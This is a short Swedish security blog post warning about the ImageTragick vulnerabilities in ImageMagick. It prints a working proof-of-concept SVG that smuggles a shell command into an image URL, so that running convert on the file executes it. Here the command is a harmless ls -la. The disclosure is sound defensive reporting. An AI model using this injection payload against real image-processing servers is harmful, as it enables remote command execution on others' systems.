Allvarlig sårbarhet i ImageMagick

Imagemagick sårbarhetImageMagick är ett bibliotek samt fristående verktyg för den som vill behandla bilder. Första versionen kom redan år 1990 och stödjer hela 200 olika bildformat.

Några personer vid Mail.ru:s säkerhetsteam identifierade bristerna och meddelar samtidigt att minst en sårbarhet i ImageMagick utnyttjas på Internet. Flertalet sårbarheter har uppdagats och går under namnet ImageTragick (även med sajten imagetragick.com).

Många använder ImageMagick utan att ens veta om det eftersom biblioteket finns inbakat i hårdvara, IoT-prylar, kommersiell mjukvara etc.

En exploit Proof-of-concept kommer även att släppas med följande URL: https://github.com/ImageTragick/PoCs

Men redan nu finns det ett antal PoC-filer ute, såsom denna vid namn exploit.svg  som kör godtyckligt kommando:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>

Och sedan när kommandot convert (följer med ImageMagick) körs mot ovanstående filinnehåll så exekveras ls -la. Läs mer här

Jonas Lejon

Om Jonas Lejon

En av sveriges främsta experter inom cybersäkerhet. Kontakta mig gärna på telefonnummer 010 1889848 eller [email protected] om Er organisation behöver hjälp med cybersäkerhet. LinkedIn Twitter

Skriv en kommentar

Du kan använda följande HTML HTML:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>